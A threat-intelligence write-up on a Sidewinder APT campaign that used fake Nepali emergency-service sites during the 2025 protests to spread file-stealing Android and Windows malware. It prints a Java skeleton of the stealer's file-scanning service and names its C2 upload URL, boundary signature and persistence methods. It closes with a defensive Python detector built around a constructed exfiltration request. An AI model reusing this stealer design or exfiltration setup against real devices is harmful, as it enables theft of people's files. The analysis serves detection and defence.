
The surge of mass demonstrations across Nepal in early September 2025 created an opportune setting for a campaign run by the Sidewinder APT group.

As protesters rallied against government policy and restrictions on social media, the attackers used the confusion to distribute malicious applications posing as legitimate emergency services.

People looking for real-time updates or help were lured by convincing imitations of official Nepali sites and ended up installing malware built to steal sensitive data from both Android and Windows devices.

Sidewinder's operation relies on a two-pronged delivery chain. On Android, victims land on phishing sites imitating the Nepalese Emergency Service login.

Spoofing the emergency service for cred phishing (Source – StrikeReady)

Once credentials are submitted, the site redirects to an APK download, typically named Gen_Ashok_Sigdel_Live.apk, which victims install believing it provides live updates.

Acting head of Nepal (Source – StrikeReady)

Meanwhile, Windows users fetch EmergencyApp.exe from a cloned Emergency Helpline site (Figure 6). Both payloads require broad access to the file system, microphone, and camera in order to carry out data theft.

Analysts at StrikeReady Labs noted the group's deliberate use of geopolitical events to drive engagement, wrapping the malicious payload in fake content attributed to reputable outlets such as Al Jazeera.

APK decoy content (Source – StrikeReady)

These decoys lend the operation credibility and help the malware pass a casual look by non-technical users. Once installed, the mobile backdoor starts a service that scans for document and image files to exfiltrate.

The Windows variant behaves the same way, spawning background tasks that harvest files with extensions such as .docx, .pdf, and .xlsx.

Infection Mechanism and Permission Abuse

Detailed inspection of the Android sample reveals a multi-threaded FileUploadService class responsible for the data theft.

Examination of data theft filters as well as infra (Source – StrikeReady)

When started, the service creates an ExecutorService backed by a fixed pool of fifteen workers and submits one task per targeted extension; each task searches device storage for matching document and image files:

```java
import android.app.Service;
import android.content.Intent;
import android.os.IBinder;
import java.util.Arrays;
import java.util.List;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;

public class FileUploadService extends Service {
  private static final int THREAD_COUNT = 15;
  // Document and image extensions the stealer looks for on device storage
  private final List<String> docExts = Arrays.asList(".txt", ".pdf", ".docx", ".xlsx");
  private final List<String> imgExts = Arrays.asList(".jpg", ".png");
  private ExecutorService executorService;

  @Override
  public IBinder onBind(Intent intent) {
    return null; // started (not bound) service
  }

  @Override
  public int onStartCommand(Intent intent, int flags, int startId) {
    executorService = Executors.newFixedThreadPool(THREAD_COUNT);
    scanAndUpload();
    // START_STICKY asks Android to recreate the service if it is killed
    return START_STICKY;
  }

  private void scanAndUpload() {
    // One task per extension; the pool runs up to THREAD_COUNT of them concurrently
    for (String ext : docExts) {
      executorService.submit(() -> uploadFiles(ext));
    }
    for (String ext : imgExts) {
      executorService.submit(() -> uploadFiles(ext));
    }
  }

  // Walks device storage for files ending in ext and POSTs each one as
  // multipart/form-data (boundary ----qwerty) to the C2 upload endpoint.
  // The method body is not shown in the analysts' excerpt.
  private void uploadFiles(String ext) {
    // ...
  }
}
```

Once files are found, they are sent in HTTP POST requests as multipart form data using a fixed boundary string (----qwerty), which is visible in the packet capture and makes the traffic easy to signature.

pcap showing ‘qwerty’ sig-able boundary (Source – StrikeReady)

All stolen files go to https://playservicess.com/dtta/files.php, a command-and-control endpoint run by Sidewinder. Persistence comes from a foreground service on Android (the service also returns START_STICKY, so the system restarts it if it is killed) and from autostart registry entries on Windows.

By combining legitimate-looking interfaces with over-privileged apps, Sidewinder builds a covert exfiltration channel capable of compromising both corporate and personal devices.

Defenders should watch for the known IOC domains (e.g., playservicess.com), unexpected APK installs, and unusual outbound multipart POST traffic. Note that the upload endpoint is served over HTTPS, so the ----qwerty boundary is only visible where TLS is terminated or inspected; without that, DNS lookups and TLS SNI for playservicess.com are the practical network indicators.
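As an added example (not code from StrikeReady or from the original write-up), the following Python shows how a defender could flag decrypted HTTP traffic that matches the indicators above: a Host header of playservicess.com, the ----qwerty multipart boundary, and uploaded files carrying the extensions the stealer filters for. The two request samples are constructed for this example, not real captures, and the helper and function names are my own.

```python
import re
from dataclasses import dataclass, field

# Indicators taken from the write-up; everything else below is illustrative.
C2_DOMAINS = {"playservicess.com"}
SIG_BOUNDARY = "----qwerty"
TARGET_EXTS = {".txt", ".pdf", ".docx", ".xlsx", ".jpg", ".png"}


@dataclass
class Verdict:
    suspicious: bool
    reasons: list = field(default_factory=list)
    filenames: list = field(default_factory=list)


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (request line, lowercase header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def boundary_from_content_type(content_type: str):
    """Return the multipart boundary (quoted or bare) or None if not multipart."""
    m = re.search(r'boundary="?([^";]+)"?', content_type, re.IGNORECASE)
    return m.group(1) if m else None


def multipart_filenames(body: bytes, boundary: str):
    """Collect filename= values from each part; stops at the closing delimiter."""
    names = []
    delimiter = b"--" + boundary.encode("latin-1")
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):  # final "--boundary--" marker
            break
        part_head = part.split(b"\r\n\r\n", 1)[0].decode("latin-1", "replace")
        m = re.search(r'filename="([^"]*)"', part_head, re.IGNORECASE)
        if m:
            names.append(m.group(1))
    return names


def inspect_request(raw: bytes) -> Verdict:
    """Score one decrypted request against the Sidewinder exfil indicators."""
    request_line, headers, body = parse_request(raw)
    reasons = []

    host = headers.get("host", "").lower().split(":")[0]
    if host in C2_DOMAINS:
        reasons.append(f"Host header matches known C2 domain: {host}")

    boundary = boundary_from_content_type(headers.get("content-type", ""))
    if boundary == SIG_BOUNDARY:
        reasons.append(f"multipart boundary matches stealer signature: {boundary}")

    filenames = []
    if boundary and request_line.startswith("POST "):
        filenames = multipart_filenames(body, boundary)
    targeted = [n for n in filenames if any(n.lower().endswith(e) for e in TARGET_EXTS)]
    # Uploading documents is normal on its own; only report it alongside a hard indicator.
    if targeted and reasons:
        reasons.append("payload carries files matching the stealer's filter: " + ", ".join(targeted))

    return Verdict(suspicious=bool(reasons), reasons=reasons, filenames=filenames)


# Constructed sample requests (not real captures) shaped like the traffic described.
MALICIOUS_REQUEST = (
    b"POST /dtta/files.php HTTP/1.1\r\n"
    b"Host: playservicess.com\r\n"
    b"Content-Type: multipart/form-data; boundary=----qwerty\r\n"
    b"\r\n"
    b"------qwerty\r\n"
    b'Content-Disposition: form-data; name="file"; filename="report.docx"\r\n'
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    b"PK\x03\x04fake-docx-bytes\r\n"
    b"------qwerty--\r\n"
)

BENIGN_REQUEST = (
    b"POST /upload HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk\r\n"
    b"\r\n"
    b"------WebKitFormBoundary7MA4YWxk\r\n"
    b'Content-Disposition: form-data; name="avatar"; filename="avatar.png"\r\n'
    b"Content-Type: image/png\r\n"
    b"\r\n"
    b"\x89PNGfake-png-bytes\r\n"
    b"------WebKitFormBoundary7MA4YWxk--\r\n"
)

if __name__ == "__main__":
    for label, req in (("malicious", MALICIOUS_REQUEST), ("benign", BENIGN_REQUEST)):
        v = inspect_request(req)
        print(label, v.suspicious, v.reasons, v.filenames)
```

The check is meant for traffic that has already been decrypted (a TLS-inspecting proxy, an on-device capture, or a sandbox), since the C2 URL is HTTPS; on the wire only the DNS lookup and SNI for the domain remain visible. The boundary string is treated as a hard indicator because a browser or common HTTP library picks a random boundary per request, whereas a hard-coded one is a tell of a custom uploader.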
